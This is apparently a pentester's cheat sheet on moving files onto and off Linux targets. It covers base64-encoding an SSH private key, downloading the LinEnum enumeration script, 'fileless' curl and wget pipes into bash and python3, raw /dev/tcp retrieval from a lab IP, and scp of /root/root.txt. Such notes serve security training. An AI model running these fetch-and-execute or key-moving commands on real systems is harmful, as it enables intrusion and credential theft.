Linux - Download

# Base64 Encoding / Decoding - Depending on the file size we want to transfer, we can use a method that does not require network communication. Check File MD5 hash ```bash md5sum id_rsa 4e301756a07ded0a2dd6953abf015278 id_rsa ``` Encode SSH key to Base64 ```bash cat id_rsa | base64 -w 0; echo LS0t... ``` Decode the File ```bash echo -n 'LS0t...' ``` Confirm the MD5 Hashes Match ```bash md5sum id_rsa 4e301756a07ded0a2dd6953abf015278 id_rsa ``` # Web Downloads with [[wget]] and [[curl]] Download a file using wget ```bash # To download a file using wget, # we need to specify the URL and the option '-O' to set the output file name. wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh ``` Download a file using curl ```bash # curl is very similar to wget # but the output filename option is lowercase '-o' curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh ``` # Fileless Attacks Using Linux Fileless Download with cURL ```bash # instead of downloading LinEnum.sh, it executes directly using a pipe curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash ``` Fileless Download with wget ```bash wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 ``` # Download with Bash (`/dev/tcp`) There may also be situations where none of the well-known file transfer tools are available. As long as Bash version 2.04 or greater is installed (compiled with `--enable-net-redirections`), the built-in /dev/tcp device file can be used for simple file downloads Connect to the Target Webserver ```bash exec 3<>/dev/tcp/<IP>/80 exec 3<>/dev/tcp/10.10.10.32/80 ``` HTTP GET Request ```bash echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 ``` Print the Response ```bash cat <&3 ``` # SSH Downloads SSH is a protocol that allows secure access to remote computers. SSH implementation comes with an SCP utility for remote file transfer that, by default, uses the SSH protocol. Enabling the SSH Server ```bash sudo systemctl enable ssh ``` Starting the SSH Server ```bash sudo systemctl start ssh ``` Checking for SSH Listening Port ```bash netstat -lnpt ``` Downloading Files using SCP ```bash scp username@<IP>:/root/root.txt /tmp/root.txt ```